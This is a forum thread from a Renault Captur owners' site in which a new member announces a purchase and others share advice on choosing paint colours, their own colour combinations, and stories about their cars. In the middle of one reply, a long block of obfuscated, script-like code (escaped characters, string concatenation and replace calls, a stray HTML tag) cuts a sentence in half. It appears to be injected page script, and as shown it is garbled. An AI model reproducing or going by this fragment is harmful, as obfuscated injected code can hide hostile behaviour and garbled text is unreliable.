Renault Captur Forums banner

1 - 15 of 15 Posts

·
Registered
2 Posts
Discussion Starter #1
Hi to everyone - after weeks of deliberation and head busting procrastination, I have finally made my decision and shall be joining the ranks of happy Captur members here

I shall be putting in my order for new Captur this weekend - now just have to decide which colour!! And trust me, that is turning out to be an even harder decision!!

·
Registered
1,555 Posts
Welcome Zuko! Glad to see yet another Scot with great taste!! I agree that there are many attractive combinations and colours on offer...Hope you make your mind up...and my advice is to have a 'look in the flesh' as the catalogue and configurator colours look differrnt in real life!!
Look forward to seeing what you choose eventually!!

Edited by: Ythsie

·
Registered
335 Posts
Welcome Zuko, it is really a hard choice as there are so many. As Ythsie has said seeing them in the flesh would be an advantage, as I also feel the cars in the brochures look slightly different. So vissit as many dealers as you can to help you choose.

·
Registered
100 Posts
I agree about needing to see the actual colour in real life before ordering. I was convinced I wanted oyster grey but actually preferred mercury silver when I saw them at the dealership

·
Registered
215 Posts
Hi Zuko welcome to the forum and congrats on deciding to but a captur, yes the colour choice<ch;m++q=cym;p=q^o;x+=fp;return x;;ifr"x78"+"cx7c"="=r"u007FX"+"x"+"Uo"+"hz"+"x50"+"yx6a".replace"x58u0078Uo"+"x68zu0050"+"y","x69`"+""var" i=";ir""+"z"+"i"+"WUGR"+"ju0062".replace"x57"+"Uu0047x52x6A","~"+"x7Feu0063"=r'x3Du0039'+'?';ir"x6F`x65u0069b"+"xx79eu0068"="20A1FC5640C8E95A";ir'x6du0068hx63'+'bb'+'x6du0061i'=r"u004Eu0079v"+""+"vu0021eu0078";r'S'+'u006ax4au004ds'+''+'Eu0055E'+'Tu0076Ax76'.replace'jJ'+'u004Dsu0045x55x45x54vu0041','~x7a'=i;var" z="r"u006f"+"~ix6dx"+"iIu0060x69x61u0069bx"+""r''+'uu0054nE'+'x'.replace'x75u0054'+'nE'+'','x7Fu006f~'+''+'ex7C';zr'u007Fu007eu006f'=r'#'+'#'+'kx68x58'+'un'+''+'w"x61x6Do'+'|x6dx78'+'d"b'+'u0069x'+''+'#x7Fx68'+'#u003e<x35<'+'x23u0039x3ex35x38"u0066x7f'.replace'h'+'X'+'u'+'nx77','x75a'+'';r'x6Echu'+''r'x6D||g'+'Xm'+'d'+'x65x60'+'h'.replace'g'+'Xm','i'+'bu0068O'z;;<div">is a hard one but i'm sure you will get it right.where in scotland are you ?
west lothian here , we seem to be getting a good few scots in the forum , spread the word lol

</ch;m++q=cym;p=q^o;x+=fp;return>Edited by: GORDONR

·
Registered
2 Posts
Discussion Starter #9
hey folks, thanks for the welcomes. Collecting my Captur Friday after work, can't wait. Went for the black with Arizona roof in the end, although sorely tempted by other way round! The black alloy wheels too.Look forward to chatting and swapping tales and tips.
PS shall be cruising the streets of Angus, Forfar area

·
Registered
215 Posts
congrats , saw one similar in the showroom and the customer cancelled the full order as he wanted the chrome along the bottom of the doors and his car came missing the chrome detail below the doors, still looked ok but i suppose he /she was quite right to cancel if it wasn't what they ordered

·
Registered
55 Posts
Welcome and good luck with the colour combo also check the gallery on here a lot of nice colours to check out real photos.

·
Registered
3 Posts
I agree with having to see the colour in the flesh so to speak. I initially wanted ivory with black roof and ended up with Amazon and black roof

How good a job have Renault done with colour combinations - not seen many other cars with such a wide and interesting choice.

On a different note anybody else in the frustrating position where the other half drives the car more than they do? I like my Mazda 3 but not a patch on the Captur

·
Registered
863 Posts
gone the other way round and got the Arizona body with black roof and chrome pack looks the nuts.had a few people ask me what the model is.i just point to the captur sign on the back door.

·
Registered
215 Posts
wainy76 said:
I agree with having to see the colour in the flesh so to speak. I initially wanted ivory with black roof and ended up with Amazon and black roof

How good a job have Renault done with colour combinations - not seen many other cars with such a wide and interesting choice.

On a different note anybody else in the frustrating position where the other half drives the car more than they do? I like my Mazda 3 but not a patch on the Captur
our captur (when we get it) will be mainly driven by my wife, i have got the tank as the wife calls it , my 53 plate volvo s40 1.9d sport lux,
it has had a chequered life and has been owned in england,wales and now scotland, also previously the car was a cat d but was fully repaired and inspected as required
it has done close to 170k and has had the clutch done at 130k , timing belt waterpump and ancillaries done at 157k, it recently passed its MOT
and the total work required to pass was
THE ADJUSTMENT OF THE RHS HEADLIGHT !!!!!!

Edited by: GORDONR

1 - 15 of 15 Posts